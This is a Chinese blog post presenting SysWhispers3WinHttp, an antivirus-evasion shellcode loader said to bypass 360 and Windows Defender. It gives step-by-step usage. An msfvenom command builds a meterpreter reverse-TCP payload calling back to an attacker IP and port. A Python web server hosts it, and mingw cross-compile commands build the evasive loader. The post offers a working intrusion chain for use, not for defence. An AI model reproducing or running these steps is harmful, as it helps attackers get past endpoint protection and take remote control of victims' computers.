免杀工具 -- SysWhispers3WinHttp

奋斗吧
奋斗吧
擅长邻域:未填写

标签: 免杀工具 -- SysWhispers3WinHttp 博客 51CTO博客

2023-06-15 18:24:26 174浏览

免杀工具 -- SysWhispers3WinHttp,0x01工具介绍SysWhispers3WinHttp基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。0x02安装与使用1.使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)msfvenom-pwindows/x64/meterpreter_reverse_tcplh

0x01 工具介绍

SysWhispers3WinHttp 基于SysWhispers3增添WinHttp分离加载,可免杀360核晶与Defender等杀软。

0x02 安装与使用

1. 使用msfvenom生成Shellcode(或使用CobaltStrike生成Stageless之Shellcode)

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.110 lport=4444 -f raw -o beacon.bin

2. 使用python3开启Web服务(或使用CobaltStrike之Host File功能)

python3 -m http.server

3. 修改SysWhispers3WinHttp.c第40行IP地址,使用Linux64位GCC进行交叉编译

x86_64-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls64.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp -O1

ps. 或修改SysWhispers3WinHttp.c第4行头文件为syscalls.h,修改第40行IP地址,使用Linux32位GCC进行交叉编译

i686-w64-mingw32-gcc -o SysWhispers3WinHttp.exe syscalls.c SysWhispers3WinHttp.c -masm=intel -w -s -lwinhttp

4、效果展示

免杀工具 -- SysWhispers3WinHttp_python

免杀工具 -- SysWhispers3WinHttp_Shell_02

免杀工具 -- SysWhispers3WinHttp_Shell_03

好博客就要一起分享哦!分享海报

此处可发布评论

评论(0展开评论

暂无评论,快来写一下吧

展开评论

您可能感兴趣的博客

django日期

java md5

springboot+vue日期类-企业排班

写一个最全的Java8日期时间

java上传图片类-企业排班springboot+vue

django拦截器之jwt类和登录拦截器

eclipse下载安装解压直接使用

文字转语音mp3在线费使用

基于ssm的员资管理系统论文

Java和vue开发的橱柜定制系统家定制系统

Java和vue开发的橱柜定制系统家<font color='red'>具</font>定制系统

java开发的玩商城系统玩

java开发的玩<font color='red'>具</font>商城系统玩<font color='red'>具</font>店

基于ssm的员资管理系统开题报告

远程0延迟录制视频-parsec

java企业人事管理系统企业资考勤系统

java企业人事管理系统企业<font color='red'>工</font>资考勤系统

管理系统定制开发

考勤系统pc网站

Java基于SSM开发的企业员管理系统

Java基于SSM开发的企业员<font color='red'>工</font>管理系统

管理系统新加功能

考勤人脸识别打卡小程序

员<font color='red'>工</font>考勤人脸识别打卡小程序

java和vue开发的大学生勤俭学助学系统

java和vue开发的大学生勤<font color='red'>工</font>俭学助学系统

系统盘c盘爆满后怎么费清理出几个G

客服QQ 1913284695